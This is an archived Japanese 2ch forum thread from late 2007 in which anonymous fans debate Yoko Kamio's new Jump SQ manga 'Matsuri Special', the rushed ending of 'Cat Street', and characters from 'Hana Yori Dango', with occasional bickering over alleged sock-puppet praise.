157 :花と名無しさん:2007/11/02(金) 12:28:23 ID:???0
大洋みたいな道明寺
類と玲
つくケイト
めがねの友達高島さん・・

親しみが湧いて買ってモタ

158 :花と名無しさん:2007/11/02(金) 17:23:02 ID:???0
JSQスレでの評価みるとまつりが一番面白かったって言ってる人がたくさんいるw
http://anime2.2ch.net/test/read.cgi/ymag/1193962501/
やっぱり冒頭のハーレム描写で引いてる人は多いけどねw

159 :花と名無しさん:2007/11/02(金) 17:29:07 ID:???0
でも静止画を静止画として描いてるからいいよね
はなっから動きを見せるんじゃなくて会話の中にプロレス少女の日常の絵を散りばめてるだけで
プロレスシーンの迫力で魅せる漫画じゃない
だからこそ肩の力を抜いて面白おかしく読めるんじゃないかな?

160 :花と名無しさん:2007/11/02(金) 17:35:39 ID:???0
>>158
ヲタか関係者が連投してるだけじゃん

161 :花と名無しさん:2007/11/02(金) 18:39:11 ID:???0
かもしれないがそれを否定する輩がでないんだよ

162 :花と名無しさん:2007/11/02(金) 18:55:24 ID:???0
相手にされてないだけじゃん
少年漫画読みに、少女漫画なんかどうでもいいし

163 :花と名無しさん:2007/11/02(金) 18:59:24 ID:???0
366 名前:作者の都合により名無しです [] 投稿日:2007/11/02(金) 17:15:50 ID:3JNypR/q0
312 名前:作者の都合により名無しです [] 投稿日:2007/11/02(金) 16:44:44 ID:znk+FMs70
まつりスペシャルかないいのは

321 名前:作者の都合により名無しです [sage] 投稿日:2007/11/02(金) 16:52:43 ID:znk+FMs70
まつりスペシャルが1位でFAかな?

354 名前:作者の都合により名無しです [sage] 投稿日:2007/11/02(金) 17:08:46 ID:znk+FMs70
まつり面白かったな。

花より男子の作者か

----
せめてIDかえろよな
馬鹿か

164 :花と名無しさん:2007/11/02(金) 19:04:01 ID:d/K4zi500
はあ?

165 :花と名無しさん:2007/11/02(金) 19:15:19 ID:???0
神尾ヲタって少年漫画板まで出張してるんだ。

166 :花と名無しさん:2007/11/02(金) 19:49:05 ID:???0
>>163
うわ…同じIDで必死にマンセーか
恥を晒さないで欲しいな

167 :花と名無しさん:2007/11/02(金) 21:00:39 ID:???0
まつり立ち読みしてきた。

まつり浮きすぎwww
けどけっこう面白かったので、立ち読み続行するよ。



168 :花と名無しさん:2007/11/02(金) 21:13:35 ID:???0
まつりの浮きっぷりには笑ったけど
SQのスレに行ったら意外に好感触な意見が多くてびっくりw
もっとけちょんけちょんに貶されてるのを覚悟してたのに
SQ読者の寛容さにおどれぇたw

169 :花と名無しさん:2007/11/02(金) 21:14:57 ID:???O
まつり面白くなかったら、
キャット大好きだった自分はこの悲しみをどこへぶつけていいか…

170 :花と名無しさん:2007/11/02(金) 21:15:06 ID:???0
好評っぽいけど、キャットの件で嫌いになったから絶対買わないと決心してる。
惰性でスレに来てしまうのが悲しいけどさ…

171 :花と名無しさん:2007/11/02(金) 21:15:55 ID:???0
ブックオフで買えば作者に印税いかないよ

172 :花と名無しさん:2007/11/02(金) 21:16:57 ID:???0
>>171
なるほどw

173 :花と名無しさん:2007/11/03(土) 00:51:15 ID:???0
>>168
あのぬるさがいいんじゃないの?<まつりスペシャル
他が、バトルとかサスペンスとか萌えとかで、少年誌でありがちな代物ばかりだから。

174 :花と名無しさん:2007/11/03(土) 01:23:41 ID:???0
だった少年誌だもの

175 :花と名無しさん:2007/11/03(土) 07:22:51 ID:???0
少女漫画読者からしたらまつりはクオリティが低く
少年漫画読者からしたら神だった
つまり少年受けしてるんだよまつりは

176 :花と名無しさん:2007/11/03(土) 10:23:57 ID:???O
>>175
神かぁ?
アンチ、叩きまではいかないにしても、イラネとか空気、浮きまくりの意見も多いけど?
ま、結果はそのうち出るだろうね。それまで様子見で立ち読みします。
私もキャットの終らせ方でいやになった口だからあまり期待はしてないけど。でも続花男でなかったのは評価ってとこかな。

177 :花と名無しさん:2007/11/03(土) 10:37:57 ID:???0
終わらせたのは作家ではなく集英社でしょう
話作るのもファン獲得するのも大変だったのに全部パーにして売れるかわからない雑誌に新作なんて自分からするかと
自分が作家の立場ならキャット最後まで書いてからまつり書いたほうがいいと思うでしょ?

178 :花と名無しさん:2007/11/03(土) 10:43:05 ID:???O
このスレでも多い意見だと思うけど、「終らせた」のが嫌なんじゃなくて「終らせ方」のやっつけ仕事ぶりが嫌われたんだと。
いつ出た話かはわからないけど、最終回描いてる時に急に来た話でないなら、も少しちゃんとまとめて欲しかったってのがキャットファンの思いなんじゃ

179 :花と名無しさん:2007/11/03(土) 11:44:30 ID:???0
急にわざとらしい擁護が湧いてきたな
神とかwww

180 :花と名無しさん:2007/11/03(土) 12:08:00 ID:???O
花男かキャットの柱にキャットはずっと書きたくて温めていた作品って書いてあった気がする。
なんだかんだ言いつつ私は神尾さんの作品が好きなんだな。
なんか悔しいけど。

181 :花と名無しさん:2007/11/03(土) 14:05:38 ID:???O
SQ本スレのぞいたけど、まつり結構評判いいんだね。
ただ、浮きすぎだの、載せる雑誌が違うだの言われまくってたけどw

182 :花と名無しさん:2007/11/03(土) 21:08:55 ID:???0
まつりはSQの看板漫画になる気がするな

183 :花と名無しさん:2007/11/03(土) 21:18:43 ID:???0
( ゚,_ゝ゚)バカジャネーノ

184 :花と名無しさん:2007/11/04(日) 02:34:51 ID:???0
少女漫画に免疫が無いやつはだめだろうな
なんであんな男がもてるんだとか、根本的に絵柄がだめなやつもいるだろう
でも後半の軽いコメディーな感じはあの雑誌の中ではほかに無いからいいとおもうが
主人公が実は強いって少年漫画の定番だしな

185 :花と名無しさん:2007/11/04(日) 09:33:53 ID:???0
少女漫画好きな人間ほど、まつりの手抜きぷりは目につくと思う

186 :花と名無しさん:2007/11/04(日) 15:01:32 ID:???0
少女マンガに免疫があってもだめだ

187 :花と名無しさん:2007/11/04(日) 15:19:55 ID:???0
wikiにまつり出てたけど、登場人物紹介に、
諸角渉(もろかど わたる)てあって、一瞬、
「えっ? 諸星 あたる(もろぼし あたる)」って思ってしまったwwww


188 :花と名無しさん:2007/11/04(日) 18:21:59 ID:???0
彼氏がスクエア買ってきて「これお前が好きな花よりなんとかの人?」って言うから
「そうそう、面白いよね」って言ったら「クソつまんねえよ。なんだこれ」と返されプチ喧嘩してしまった・・・
なんか一日中口利いてくれない
そんなに男ウケ悪い作風かな?

189 :花と名無しさん:2007/11/04(日) 18:31:22 ID:???0
>>188
漫画LOVERにとっては普通に面白い作品。そうでもない男にはムカッときて最後まで読まないかもしれない作品。
俺様も最初はなんだこの池面ハーレム作ってむかつくなーくらいに思ってネットで酷評してやる!と思ったけど最後まで読んだらかなり面白かったよ。
そんな俺は萌え漫画以外は読み飛ばさないし目次の作者近況まで読むヲタだけどね。

190 :花と名無しさん:2007/11/04(日) 18:42:25 ID:???0
>>189
何このいかにもな嘘くさい絶賛擁護w
漫画LOVERとか名乗る男がわざわざ来てるとは思えない
具体的にどのへんが「かなり面白かった」?

191 :花と名無しさん:2007/11/04(日) 18:52:44 ID:???O
まつりカワイイよまつりΣb´∀`


192 :花と名無しさん:2007/11/04(日) 18:53:52 ID:???0
>>190
好みの男性に罵られた前途多難な展開、最近の少年漫画だと最初からあからさまに両思いなりお互い気にし合っているものばかり
不思議と嫌味のあるキャラクターがいないところ、最近の少年漫画だと過剰な暴力、刃物、下ネタ強姦ネタばかり
絡んできた男の子たちをやっつけた痛快さと未知数な強さ、それを目撃した謎の少年重松、次号に期待せずにはいられないよ

193 :花と名無しさん:2007/11/04(日) 18:59:20 ID:???0
プロレスをちっとも理解していないよこの人
アマレスじゃないのか

194 :花と名無しさん:2007/11/04(日) 19:14:11 ID:???O
「まつり」関連レスばかりになったら板違いなんて自治厨が湧いてこないか心配。
結局、少年誌にたまたま掲載中の少女漫画って事でいいんだよね? それなら全然板違いじゃないし。

195 :花と名無しさん:2007/11/04(日) 19:27:47 ID:???0
藤子Aは漫画板だし、別にそれで良いと思う
自治厨沸いたらそんとき少年漫画板にまつりスレ立てればいいよ

196 :花と名無しさん:2007/11/04(日) 22:00:28 ID:???0
誰か少漫板にまつりスレ立ててくださいよ

197 :花と名無しさん:2007/11/04(日) 22:16:28 ID:???0
立てられなかった。テンプレ作ったから誰かよろしく。

このスレはジャンプSQ.連載中の『まつりスペシャル』について語るスレです。

1)基本的にsage進行でお願いします。
2)ファンサイトなどの話題や個人的中傷などのレスは禁止です。
3)レス900過ぎたら引越し準備、950を踏んだ人が新スレ立てお願いします。
立てられなかったら>>960か代理の人が立てましょう。
4)煽り・荒らしには反応しない。大人の分別でぐっとこらえてスルー。
5)お話が盛り上がってもチャット状態にならないよう自粛しましょう。
6)ネタバレはネタバレスレで。
7)同作者の本作以外の話題は少女漫画板の専用スレで。

毎月4日発売予定
【公式】http://jumpsq.shueisha.co.jp/

関連スレ
【月刊】ジャンプスクエア Part7【SQ.】
http://anime2.2ch.net/test/read.cgi/ymag/1194144575/
ジャンプSQ一行感想スレッド
http://anime2.2ch.net/test/read.cgi/ymag/1194043570/
月刊ジャンプSQ総合ネタバレスレッド 創刊号
http://anime2.2ch.net/test/read.cgi/comic/1192369827/
【花より男子】神尾葉子39【キャットストリート】
http://anime2.2ch.net/test/read.cgi/gcomic/1190209711/

198 :花と名無しさん:2007/11/04(日) 22:20:35 ID:???0
立てなくていいよ
もう一週間しないうちに一日一まつりレスもなくなるでしょ

199 :花と名無しさん:2007/11/04(日) 23:59:02 ID:???0
とりあえず立てちゃった

【ジャンプSQ】まつりスペシャル Part1【神尾葉子】
http://anime2.2ch.net/test/read.cgi/ymag/1194188261/

200 :花と名無しさん:2007/11/05(月) 17:23:41 ID:???O
まつりスレが立った途端に過疎ったね、ココw
キャットの最終巻が出るまでこんな感じかな

201 :花と名無しさん:2007/11/05(月) 22:50:01 ID:???0
そりゃまつりの話をする途端にアンチレスが付くから
まつりの話をしたい人達は専用スレに逝っちゃうさwww

202 :花と名無しさん:2007/11/05(月) 23:22:02 ID:???0
花沢類の続編もうすぐだよね


203 :花と名無しさん:2007/11/06(火) 01:55:50 ID:???0
まつり目当てにSQかってみたけど
神尾先生・・・これはないよぅ
女の私でもジャーマンスープレックスはわかるよ?
動きがない絵くらいはちゃんと描いて欲しい
何だかがっかりしちゃったなあ
新境地に挑戦!って楽しみだったのにね

204 :花と名無しさん:2007/11/06(火) 22:27:18 ID:???0
つーかさ、まつりアンチはこっちで話したらどうね
あっちはあっちが好きな人で
あっちも迷惑なんでないの

205 :花と名無しさん:2007/11/06(火) 22:34:55 ID:???0
アンチとか信者とか関係ないでしょ
普通に身のある話をしたいだけ
あっちは信者がなんか痛々しいね

206 :花と名無しさん:2007/11/06(火) 22:45:07 ID:???0
鏡みてみたらどうだろ?自分の異常さに気づけないのはやばいよ

207 :花と名無しさん:2007/11/06(火) 22:47:34 ID:???O
金のティアラ読み返してて思ったんだけど神尾さん読み切りは話の完成度かなり高いな。
西門さんの方もすごくよかったし。
連載より花男以外の読み切りとか読んでみたい。

208 :花と名無しさん:2007/11/07(水) 02:31:15 ID:???0
西門読みきりはかなり良い
花男後期のグダグダっぷりに辟易してたから
あんな話が描けるんだと当時思ったもんだ

209 :花と名無しさん:2007/11/07(水) 04:00:52 ID:???0
あれきっかけで西門好きになったw

210 :花と名無しさん:2007/11/10(土) 14:37:41 ID:???O
花男の中では道明寺の母が最低な親扱いされているけど、つくしの両親も充分最低。
自分の見栄のためだけに娘をあんな学校に通わせて、子供に苦労させてんだもん。
おまけにつくしが道明寺と付き合っているって知ったら、仕事しないんでしょ?だめ親じゃん。
漁村でのことも自業自得だし。

211 :花と名無しさん:2007/11/10(土) 15:08:14 ID:???O
それは前からみんな言ってるw
プロムのドレス破ったのムカついたって人も結構いたし。

あと、静も初めて会ったとき嘲笑したり、類の気持ち知っててずっと弄ぶようなことしてたのみてると
椿のような本当にいい人ではないんだよね。
周りを見下すような言動もちょくちょくしてたし、類が3巻で言ってたような人だと思った。
そういう微妙な人柄って普通の少女漫画じゃ貴重だと思うんだけどつくしにいわせるといい人なんだよね

212 :花と名無しさん:2007/11/10(土) 21:48:29 ID:???0
どんな人間でもいい面と悪い面があり、つくしの中では良い面のが勝ったんだろ

213 :花と名無しさん:2007/11/11(日) 00:19:44 ID:???0
漫画喫茶で「キャットストリート」を第1巻から7巻まで読んだ。

214 :花と名無しさん:2007/11/13(火) 19:43:41 ID:???0
このスレを見ている人はこんなスレも見ています。(ver 0.20)
漫画「花より男子」ファンサイトヲチ2 [ネットwatch]
【ジャンプSQ】まつりスペシャル Part1【神尾葉子】 [少年漫画]
月刊ジャンプSQ総合ネタバレスレッド 創刊号 [漫画]
ジェリー・イェン【言承旭】PART93 [海外芸能人]
【月刊】ジャンプスクエア Part3【本日創刊】 [少年漫画]


215 :花と名無しさん:2007/11/19(月) 12:43:29 ID:???O
ジャンプSQ読んだ。
プロレスの衣装と設定が、某漫画と似てる。
あの衣装はよく使われるのかな。

216 :花と名無しさん:2007/11/20(火) 05:54:31 ID:???0
マーガレットの次号は特大号だけど、HP見る限り類番外編の掲載気配がない。
年末年始辺りに掲載じゃなかったっけ?


217 :花と名無しさん:2007/11/21(水) 08:52:05 ID:???0
次号予告に花男のってたよ。

218 :花と名無しさん:2007/11/21(水) 09:36:36 ID:???O
1月だよ

219 :花と名無しさん:2007/11/21(水) 10:40:54 ID:???0
見事に閑古鳥
一週間近くレスがなかったとかどんだけ

220 :花と名無しさん:2007/11/21(水) 22:45:48 ID:???0
まつりスレもそこまで賑わっていなかった

221 :花と名無しさん:2007/11/25(日) 15:48:38 ID:???O
まつり人気あるの?

キャットをあんなやっつけな終わり方させておいて何を描くのかと思って見たら…
がっかりでした

222 :花と名無しさん:2007/11/26(月) 00:16:58 ID:???0
キャット売ってきた
結局、7巻は読み返さなかったな・・・・

223 :花と名無しさん:2007/11/27(火) 10:25:01 ID:???0
だらだら続いた花男よりはキャットのほうが好きだけどな。
みんな花男のほうが好きなのか。

224 :花と名無しさん:2007/11/27(火) 12:24:46 ID:???O
私はキャットが好きだったからこそ、終わらせ方に萎えたくち。
編集の意向が絡んだとしても、風呂敷のたたみかたが下手なんだな〜って思う。
花男のだらだら加減も、形は違うけどまとめベタが出てるよね。

225 :花と名無しさん:2007/11/27(火) 17:38:11 ID:???0
>>223
キャットが好きだからこそ、ちゃんとした形で完結して欲しかったよ。
あまり深い所掘り下げたり、綿密な下調べとかしない人だとは
思ってたけど、せめてもう少し丁寧に書いた上で荒井エピとか
盛り込んで欲しかった。

226 :花と名無しさん:2007/11/27(火) 23:05:39 ID:???0
花男よりキャットが好きだけど
最後の拉致監禁で脱落した
思えば花男も道明寺の記憶喪失付近で脱落した・・・・

227 :花と名無しさん:2007/11/27(火) 23:44:15 ID:???0
話は花男のが好きだけど相手役はキャットのが好き

228 :花と名無しさん:2007/11/28(水) 02:09:22 ID:???0
キャットも好きだけど、どっちかと言われると花男のが好きかな。
中高時代に嵌ったものはなかなか嫌いになれない。後半の話がダラダラでもw


229 :花と名無しさん:2007/11/28(水) 05:14:43 ID:???0
花男は主役カプより脇キャラにはまってた

230 :花と名無しさん:2007/11/28(水) 07:29:26 ID:???0
キャットの最終巻はいつでるのかな

231 :花と名無しさん:2007/11/28(水) 08:22:59 ID:???0
1月じゃね

232 :花と名無しさん:2007/11/28(水) 10:40:32 ID:???0
まだ先だなぁ
てかまた別マにも描くらしいよね
キャット終わる時にそう書いてた

233 :花と名無しさん:2007/11/28(水) 13:03:23 ID:w60CukTXO
キモイ!松田翔太

234 :花と名無しさん:2007/11/28(水) 13:29:28 ID:???O
>>223
キャットの方が好き
でもいきなり3年飛んだあたりから萎えてきた…

235 :花と名無しさん:2007/11/28(水) 15:19:06 ID:???0
>>226
自分も拉致の時点で、もうネタ切れかいとか思って萎えたなあ
困ると安易に事件起こすのか、この人

236 :花と名無しさん:2007/11/29(木) 00:54:05 ID:???0
拉致は別にいいけど、その後の収束の仕方がな・・・

237 :花と名無しさん:2007/11/30(金) 19:20:04 ID:???O
伝説になった時はもう笑うしかなかった

238 :花と名無しさん:2007/11/30(金) 22:23:24 ID:???0
伝説になるの早すぎ

239 :花と名無しさん:2007/12/01(土) 03:53:35 ID:???0
伝説とか安っぽいすぎ

240 :花と名無しさん:2007/12/02(日) 21:49:21 ID:gWxF9G970
拉致自体は別にいいけどその後の展開のさせ方が下手すぎてびっくり
浩一とか相手役のキャラはいいんだからもっと上手い終わらせ方してほしかったなぁ


241 :花と名無しさん:2007/12/04(火) 12:10:07 ID:???O
「俺の話をしようか」ってw
これまた斬新なタイトルだな

48 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)